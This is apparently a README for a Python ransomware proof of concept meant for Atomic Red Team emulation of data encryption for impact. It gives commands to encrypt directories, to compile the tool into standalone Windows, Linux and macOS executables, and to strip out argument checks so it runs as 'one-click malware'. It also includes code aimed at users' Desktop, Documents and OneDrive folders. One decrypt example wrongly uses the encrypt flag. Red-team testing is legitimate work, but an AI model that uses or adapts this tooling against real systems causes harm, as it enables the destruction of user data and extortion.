A simple, fully python ransomware PoC using AES-CTR and RSA. Supports Windows, Linux and macOS
A simple python ransomware PoC that can be used for Atomic Red Team: ATT&CK Technique: Data Encrypted for Impact (T1486). The project is built off CryptSky and full credits goes to deadPix3l for his code. The updated code demonstrates a typical ransomware flow and it is just one of many ways to perform ransomware encryption.
TLDR:
Warning: Be extra careful of running the program as it will modify files. Ensure the path is correct and be wary in running with administrative privileges.
There are two versions:
Version 1: main.py
Version 2: main_v2.py
Install dependencies:
pip3 install pycryptodome
Default:
Encrypt: python3 main.py -e or python3 main_v2.py -e
Decrypt: python3 main.py -d or python3 main_v2.py -e
Windows with specific path:
Encrypt: python3 main_v2.py -p "C:\users\jimmy\desktop\test_ransomware" -e
Decrypt: python3 main_v2.py -p "C:\users\jimmy\desktop\test_ransomware" -d
Linux/macOS with specific path:
Encrypt: python3 main_v2.py -p "/home/jimmy/test_ransomware" -e
Decrypt: python3 main_v2.py -p "/home/jimmy/test_ransomware" -d
Variables to change:
NB: As this is simply a PoC for Atomic Red Team, there is no real need to change the keys or other variables.
Tested with python 2.7 with pyinstaller 3.6 and python 3.7 with pyinstaller 4.0. Please note that python 3.8 with pyinstaller 4.0 have known issues as this was incompatible with macOS.
Windows and Linux:
pip3 install pyinstaller
pyinstaller --onefile main_v2.py or py -m PyInstaller --onefile main_v2.py
macOS:
(python 3.7)
python3 -m pip install pyinstaller
pyinstaller --onefile main_v2.py
(python 2.7)
pip install -I pyinstaller==3.6
python -m PyInstaller --onefile main_v2.py
See /bin
folder for binaries.
Windows with specific path:
Encrypt: main_v2.exe -p "C:\users\jimmy\desktop\test_ransomware" -e
Decrypt: main_v2.exe -p "C:\users\jimmy\desktop\test_ransomware" -d
Linux with specific path:
Encrypt: ./main_v2 -p "/home/jimmy/test_ransomware" -e
Decrypt: ./main_v2 -p "/home/jimmy/test_ransomware" -d
macOS with specific path:
Encrypt: ./main_v2_macos_py2 -p "/Users/jimmy/test_ransomware" -e
Decrypt: ./main_v2_macos_py2 -p "/Users/jimmy/test_ransomware" -d
I originally added arguments to prevent accidental clicks and mess up. To simulate a one-click malware, comment and uncomment the following:
Comment
if len(sys.argv) <= 1:
print('[*] Ransomware - PoC\n')
# banner()
print('Usage: python3 main.py -h')
print('{} -h for help.'.format(sys.argv[0]))
exit(0)
# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt
absolute_path = str(args.path)
Uncomment
absolute_path = "None"
encrypt = True
decrypt = False
There is support for multiple paths, add them as such:
startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
os.environ['USERPROFILE'] + '\\Documents',
os.environ['USERPROFILE'] + '\\Music',
os.environ['USERPROFILE'] + '\\Desktop',
os.environ['USERPROFILE'] + '\\Onedrive']